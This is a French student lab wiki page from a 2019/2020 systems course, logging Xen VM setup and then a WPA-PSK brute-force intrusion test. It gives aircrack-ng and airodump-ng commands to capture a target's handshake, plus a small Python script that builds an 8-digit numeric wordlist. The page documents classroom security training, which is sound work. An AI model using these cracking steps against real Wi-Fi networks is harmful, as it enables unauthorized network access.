TP sysres IMA5sc 2019/2020 G4

De Wiki d'activités IMA
Révision datée du 25 novembre 2019 à 17:09 par Bmuzakar (discussion | contributions) (1ère seance: Installation de la machine virtuelle Xen)

1ère seance: Installation de la machine virtuelle Xen

choix du nom de domaine

Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.

Installation de la machine virtuelle Xen Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande:

   xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen


Adresse MAC obtenue: 00:16:3E:D6:E1:DF

Lors de la 2ème séance:

3. Architecture réseau

4. Services Internet

5. Tests d’intrusion

Cassage de mot de passe WPA-PSK par force brute

Lors de la 2ème séance: Nous avons utilisé aircrack-ng pour lancer une recherche sur le mot de passe de l’identification par WPA-PSK en supposant que ce nombre est sur 8 chiffres. D'abord on vérifie que le Wi-Pi est connecté:

 ls usb

Ensuite on récupère le nom de notre interface:

 iwconfig

On obtient wlx40a5ef0125e9, si il n'est pas en mode 'Monitor' il est nécessaire de lancer la commande

 airmon-ng start wlx40a5ef0125e9

On récupère alors tout les points d'accès accessibles en wifi (et donc l'adresse de la cible) via:

 airodump-ng wlx40a5ef0125e9

Ensuite il faut récupérer le paquet OnCheck grâce à la commande suivante où -c permet de préciser le numéro du channel, -bssid l'adresse MAC de la cible et -w le path du fichier où écrire le résultat.

 airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w ./home/pifou/packedOneCheck wlx40a5ef0125e9

Ensuite nous avons écrit un script Python pour générer le dictionnaire:

 dictfile=open("dict.txt","a")
 for i in range(99999999):
   dictfile.write(str(i)+'\n')
 dictfile.close()

On peut alors lancer le cassage à l'aide de:

 aircrack-ng -a2 -b 04:DA:D2:9C:50:5D -w path_to_dict/dict.txt path_to_packedOneCheck_result/*.cap